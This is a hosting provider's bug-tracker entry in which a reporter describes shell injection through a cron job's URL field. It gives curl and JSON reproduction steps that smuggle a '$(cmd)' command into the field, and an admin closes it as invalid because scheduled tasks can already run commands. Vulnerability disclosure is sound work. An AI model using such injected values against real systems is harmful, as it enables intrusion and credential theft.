Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by SiddharthSharma - 05.10.2026
Last edited by cbay - 05.10.2026

FS#518 - Remote Code Execution

Title: Cron TYPE_URLS Accepts Single-Quote in URL Argument — Shell Injection → Remote Code Execution

Severity: Critical

Summary

The cron job feature's TYPE_URLS type is documented as accepting "a list of URLs to request" — it is designed to fetch URLs via curl, not execute arbitrary shell commands (TYPE_COMMAND exists for that). However, the API accepts a single-quote ' character inside the URL argument without rejection. By injecting '$(cmd)' into the URL, the shell quoting is broken and cmd executes as a real command on alwaysdata's jobs server under the account's UID.

Steps to Reproduce


Prerequisites: Any alwaysdata account (free plan). API token from https://admin.alwaysdata.com/token/.

Step 1 — Write payload to file (prevents local shell expansion):
cat > /tmp/job.json << 'EOF'
{
  "type": "TYPE_URLS",
  "argument": "http://x.com/'$(id>/home/YOUR_ACCOUNT/www/rce_proof.txt)'",
  "date_type": "FREQUENCY",
  "frequency": 1,
  "frequency_period": "minute"
}
EOF

Step 2 — Create the malicious cron job:
curl -u "YOUR_API_TOKEN account=YOUR_ACCOUNT:" \
  -X POST "https://api.alwaysdata.com/v1/job/?format=json" \
  -H "Content-Type: application/json" \
  -d @/tmp/job.json \
  -w "\nHTTP STATUS: %{http_code}\n"
Expected: HTTP STATUS: 201 — single-quote inside the URL is accepted with no error.

Step 3 — Wait up to 60 seconds for the cron to fire.

Step 4 — Verify RCE:
curl https://YOUR_ACCOUNT.alwaysdata.net/rce_proof.txt
Expected output:
uid=XXXXXX(YOUR_ACCOUNT) gid=XXXXXX(YOUR_ACCOUNT) groups=XXXXXX(YOUR_ACCOUNT)
This file was created by the injected id command running on alwaysdata's server.

Step 5 — Clean up:
# Get JOB_ID from the Step 2 response header Location or re-list jobs:
curl -u "YOUR_API_TOKEN account=YOUR_ACCOUNT:" \
  "https://api.alwaysdata.com/v1/job/?format=json"

curl -u "YOUR_API_TOKEN account=YOUR_ACCOUNT:" \
  -X DELETE "https://api.alwaysdata.com/v1/job/JOB_ID/?format=json"

Closed by  cbay
05.10.2026 08:56
Reason for closing:  Invalid
Admin
cbay commented on 05.10.2026 08:56

Hello,

You can already execute any command you want when creating a scheduled task, so that's not a vulnerability.

Kind regards,
Cyril

Following is the Impact and Video P.O.C attacked below.

Impact

1. Full account RCE — arbitrary shell commands run on alwaysdata's jobs server as your account UID, giving read/write access to all account files (SSH keys, DB passwords, .env, source code).

2. No credentials needed for exploitation via chaining — an attacker who finds XSS/CSRF on the admin panel can plant this cron job on any victim account without knowing their password.

3. Persistent backdoor — attacker can write web shells, add cron jobs, or modify startup scripts that survive password resets.

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing